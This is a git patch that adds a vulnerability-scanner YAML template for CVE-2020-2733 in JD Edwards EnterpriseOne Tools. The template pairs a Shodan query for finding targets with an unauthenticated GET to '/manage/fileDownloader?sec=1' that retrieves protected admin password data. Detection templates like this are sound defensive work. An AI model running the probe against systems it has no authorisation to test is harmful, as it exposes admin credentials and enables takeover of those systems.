From 2ce6d9aa04492b67d4f57a2760fdea095c904c51 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Wed, 21 Sep 2022 15:40:52 +0530
Subject: [PATCH] Create CVE-2020-2733.yaml

---
 cves/2020/CVE-2020-2733.yaml | 38 ++++++++++++++++++++++++++++++++++++
 1 file changed, 38 insertions(+)
 create mode 100644 cves/2020/CVE-2020-2733.yaml

diff --git a/cves/2020/CVE-2020-2733.yaml b/cves/2020/CVE-2020-2733.yaml
new file mode 100644
index 0000000000..6f7ef28d1f
--- /dev/null
+++ b/cves/2020/CVE-2020-2733.yaml
@@ -0,0 +1,38 @@
+id: CVE-2020-2733
+
+info:
+  name: JD Edwards EnterpriseOne Tools admin password not adequately protected
+  author: DhiyaneshDk,pussycat0x
+  severity: critical
+  description: Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks of this vulnerability can result in takeover of JD Edwards EnterpriseOne Tools.
+  reference:
+    - https://redrays.io/cve-2020-2733-jd-edwards/
+    - https://www.oracle.com/security-alerts/cpuapr2020.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-2733
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2733
+  metadata:
+    verified: true
+    shodan-query: product:"Oracle WebLogic Server"
+  tags: cve,cve2020,oracle,weblogic
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/manage/fileDownloader?sec=1'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'ACHCJK'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/plain"
+
+      - type: status
+        status:
+          - 200